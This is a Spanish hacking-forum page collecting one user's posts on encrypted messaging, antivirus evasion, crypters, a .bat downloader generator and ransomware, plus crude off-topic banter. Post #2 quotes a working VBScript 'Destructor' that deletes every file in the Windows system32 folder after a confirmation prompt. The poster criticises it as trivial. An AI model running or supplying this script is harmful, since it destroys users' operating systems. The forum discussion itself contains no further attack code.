Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - OnTheCore

#1
Dudas y pedidos generales / Re:Conversaciones encriptadas
Noviembre 12, 2016, 12:24:58 PM
Podés usar GPG para firmar y cifrar los emails. Después podes hablar por AIM/ICQ/XMPP/IRC con OTR.
GPG te garantiza autenticidad y privacidad, OTR te garantiza autenticidad, privacidad, denegabilidad y que las conversaciones previas no sean descifradas si perdes tu clave privada.
No existe algo mejor que esto creo yo.

CitarHasta donde yo se deberia contar con:

- Cifrado de punta a punta.
- Borrado automatico de mensajes.
- Que no guarde absolutamente nada en la nube, ni en registros.
No existen los borrados automaticos de mensajes. Los que implementan esto, no son realmente seguros ya que es modificable y siempre se pueden tener copias/screenshots/fotos.
Si tenés cifrado de punta a punta no quedan registros del texto en claro en el medio, pero el texto cifrado queda logueado porque en internet todo se guarda.
Acordate, en la informática no se borra nada y todo queda guardado. Ante la duda, suponé que alguien lo puede llegar a ver.

Otro dato importante, una cadena es tan fuerte como su eslabón mas débil, así por mas seguras que sean tus comunicaciones, estas pueden ser comprometidas si acceden físicamente a lo que estés usando para realizar las comunicaciones.
Yo personalmente si necesitara privacidad nunca utilizaría mi teléfono.
#2
Análisis y desarrollo de malwares / Re:[VBS] Destructor
Noviembre 10, 2016, 02:34:45 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola chicos, se que es un script MUY basico. Pero lo probe en windowsXP service pack 3 x86 y funciono.
Es parte de un pack simple de herramientas de Fabian Portantier, profesor de la carrera de Seguridad Informatica en EducacionIT.


Código: php
On Error Resume Next

'Desarrollado por Fabian Portantier'

strDir = "C:\WINDOWS\system32\"

Mensaje = "Este programa es una prueba de concepto, que demuestra como algunos archivos " &_
"no son detectados por los antivirus, aun cuando lo unico que hacen es eliminar componentes de sistema." &_
"Esta seguro de que desea ejecutar este programa?"

retval = msgbox(Mensaje, vbYesNo, "Cuidado!")
if retval = vbYes then
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(strDir)
Set fc = f.Files
For Each f1 in fc
fso.DeleteFile f1, True
Next
end if


Es re basico, pero que opinan? ..
Eso no es malware, solamente borra todos los archivos en System32. Ejecutalo en una cuenta de usuario o en guest y no va a funcionar.
El antivirus es una barrera protectora, no es una herramienta para salvar usuarios estúpidos o malas configuraciones.
Si un script vbs que borra todos los archivos de system32 tiene que ser detectado como virus, un rm -rf también tendría que ser detectado y la herramienta format.exe también, dd también, etc.
#3
Citar1) Si, si es polimorfico, entendiendo como polimorfismo:
"En relación a los virus informáticos un código polimórfico o polimorfismo es aquel que se sirve de un motor polimórfico para mutarse a sí mismo mientras mantiene su algoritmo original intacto. Esta técnica es utilizada comúnmente por virus informáticos y gusanos para ocultar su presencia."
Vos mismo me estas justificando. Eso que generas no se parece ni un poco a un gusano o a un virus. Es un downloader.
El programita genera un downloader ofuscado el cual supongo que va a ser ejecutado en varias maquinas. En todas esas máquinas que se ejecute va a decargar y ejecutar algo y se va a borrar (eso es lo que supongo que hace un downloader) y en todas esas máquinas el código va a ser el mismo a menos que descubras un método de mutar el código sin ejecutar. Nunca cambia nada, solamente el "Polymorphic sadownloader" genera scripts que son parcialmente distintos entre si.
El script generado nunca muta, y si es que muta (ni me quiero gastar en probarlo) algo estas haciendo mal, porque es un downloader y un downloader se ejecuta una sola vez.

Ahora te doy un ejemplo de polimorfismo en virus o gusanos. Tenemos un virus polimorfico que va a infectar todos los ejecutables en archivos removibles. Cada vez que infecta un ejecutable va a meter una copia de si mismo modificada (generalmente cifrada con un mismo algoritmo y distinta llave) en el ejecutable huésped, entonces cada ejecutable va a tener una copia del virus "distinta".
En teoría, esto permitía (o permite) saltarse los motores de firmas de antivirus. Cual es el punto débil? la parte estática que no se modifica.
Lo que haces se parece en algo? yo creo que no.

Si mis criticas no son constructivas no te critico mas, total el que no progresa sos vos. Ya te vas a dar cuenta de que lo que te digo es cierto cuando aprendas mas del tema.

PD: por ahí hay un comando que si le tiras una url te la descarga y no salta el av (depende que descargues) y no tenes que hacer cosas poco prácticas.
#4
No es un downloader polimorfico, simplemente estas generando archivos .bat mas o menos ofuscados.
Las compañias antivirus no detectan esto porque no tienen ganas, pero en casos donde (como en estos .bat que generas) hay partes que varían y partes estáticas, ponen una firma en la parte estática y listo, detectado.
Por otra parte, es un .bat, cualquier firewall o sistema de detección por comportamiento lo detecta rapidísimo.
No lo tomes como ofensa.
#5
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola disculpá...como hiciste el formulario en visual basic?  :-[
sabe programar.


#6
Por si hay alguien con ganas de robar leyendo este post o alguien que fue infectado por alguien con demasiado tiempo libre y ganas de robar centavos. Este ransomware es tan fácil de bypassear como buscar la contraseña de cifrado hardcodeada (puede ser que la obfusquen también, pero no es dificil encontrarla) en el ejecutable y buscar la función que se encarga de cifrar el archivo.
Si es que se ponen a obfuscar cosas para que parezca inentendible, es cuestión de abrir el ejecutable con un debugger y poner un breakpoint en la función que cifra los archivos.
#7
Off Topic / Re:Armar team de research via IRC.
Octubre 03, 2016, 11:24:26 AM
A mi me re cabe la idea
#8
A mi me pasa lo mismo. Creo que cuando un hobby pasa a ser algo mas serio termina dejando de gustar.
Otra cosa que me desanima es que todo avance tan rápido y que cosas a las que le dediqué tiempo queden o sienta que estan por quedar obsoletas y tenga que volver a aprender todo. También pasa que cuando se pincha esa ilusión de "la cultura hacker, el underground" y demás estupideces te das cuenta que solo sos alguien más del montón.
Y lo que mas me desanima es que las cosas que realmente me gustan no me sirvan ni un poquito para conseguir trabajo. Sino que para conseguir trabajo tengo que aprender y hacer las cosas que me aburren porque de eso se trata el mercado.

#9
Dudas y pedidos generales / Re:Formateo PENDRIVE
Septiembre 27, 2016, 11:29:20 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Un formateo a bajo nivel estaría bien. Tardará bastante más tiempo pero quizás se resuelva este problema.

Prueba además "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" para asignar las particiones, formatearlas, etc. Pero primero formateo a bajo nivel sería lo ideal.

Saludos
NO, NUNCA UN FORMATEO A BAJO NIVEL A UN PENDRIVE.
Las memorias flash tienen una cantidad limitada de escrituras/lecturas. Cada vez que formateas a bajo nivel un pendrive estas escribiendo todas las celdas de memoria en el borrado mas leve. Si le das mas pasadas o usas otros métodos escribis el doble, el tripe o n veces mas.
No se te va a romper, pero te acorta un montón la vida útil.
Lo mismo con los discos de estado sólido. Si los formateas a bajo nivel, los cifras o los desfragmentas los estas desgastando al pedo y reduce bastante la vida útil.
#10
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Septiembre 19, 2015, 05:39:47 PM
Me borran los posts...

Por comedor o por colectora?
#11
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Este "crypter" es un copypaste de un copypaste de un copypaste de un copypaste de un "crypter". Todo el mundo usa la misma tecnica que no sirve para nada.

Es viejo, solo lo remodifique, no es copypaste de nada.
Que se use el mismo metodo no quiere decir que copie y pegue codigo.
Ademas si tienes derecho a dar tal critica ? supongo que eres programador.
Tus aportes deben de ser excelentes.

Saludos, y dedica más tiempo a aprender que a criticar lo ajeno.
Creo haber escrito un post acerca de crypters de este tipo. No aprendi eso magicamente.
Dudo que sepas para que funciona cada api que usaste en ese codigo.
No aporto codigo para evitar que la gente copie y pegue, como hacen siempre ;)

Revisa mis aportes anteriores y comprueba si se o no se del tema, cada API y más aun de las que hay en el code.
Por algo soy de los que aporta y no de los que critican. Mi intención fue a portar un code que tenia desarrollado
no discutir de lo que se o lo que no.
Con respecto a tus post, son puras criticas hacia la gente que aporta, si bien si hay mucha gente que aporta cosas robadas, este no es el caso.
Pero en fin no siempre se deja contento a todo el mundo, que pases un buen resto del dia, no me interesa discutir.
Critico para ayudarlos/guiarlos. Por lo que veo en tus posts, por ejemplo el de la infeccion de ejecutables, veo que no tenes ni idea de que es una cabecera PE y estas portando tecnicas de mala calidad empleadas en vb6 generalmente. Sacate el titulo ese de programador de malware que vos solo te pusiste.
#12
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Este "crypter" es un copypaste de un copypaste de un copypaste de un copypaste de un "crypter". Todo el mundo usa la misma tecnica que no sirve para nada.

Es viejo, solo lo remodifique, no es copypaste de nada.
Que se use el mismo metodo no quiere decir que copie y pegue codigo.
Ademas si tienes derecho a dar tal critica ? supongo que eres programador.
Tus aportes deben de ser excelentes.

Saludos, y dedica más tiempo a aprender que a criticar lo ajeno.
Creo haber escrito un post acerca de crypters de este tipo. No aprendi eso magicamente.
Dudo que sepas para que funciona cada api que usaste en ese codigo.
No aporto codigo para evitar que la gente copie y pegue, como hacen siempre ;)
#13
Este "crypter" es un copypaste de un copypaste de un copypaste de un copypaste de un "crypter". Todo el mundo usa la misma tecnica que no sirve para nada.
#14
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 31, 2015, 12:33:51 AM
Creyente. No creía en dios hasta que me miré al espejo.

rusia o usa?
#15
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 30, 2015, 05:19:49 PM
Pego las flores en la zabaleta y la zabaleta en flores.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Verdura!

Ocio digital: Juegos o música?

Porno

Pepa en lengua o en ojo?

#16
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 30, 2015, 03:52:36 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gas papa

Choripan o morcipan?
Sanguche de bondiola

Fiorito o fuerte apache?
#17
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 30, 2015, 03:31:05 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Abajo

Mina muy fea o travesti?
-Travesti

Nafta o gas
#18
La verdad es que en la informática los límites tienden a desaparecer.
Asi que donde estes centrado te va a hacer aprender un monton de cosas que te van a llevar a aprender otras. En cambio si lees de todo un poco nada va a tener que ver con nada y tu cerebro al no poder asociarlo con otra cosa, lo olvida.

Igualmente si te pones a pensar en el pentesting, hacer botnets y esas cosas poco éticas que queres hacer parecen cosas totalmente separadas para alguien que no tiene idea de nada, pero una persona con conocimientos muy profundos en programación y el entorno (SO) se le hace muy sencillo entender esos temas.
#19
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 29, 2015, 07:15:13 PM
- Playa para ver culos.

Culos o tetas?
#20
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 29, 2015, 07:00:34 PM
- wireshark
Rubia o morocha?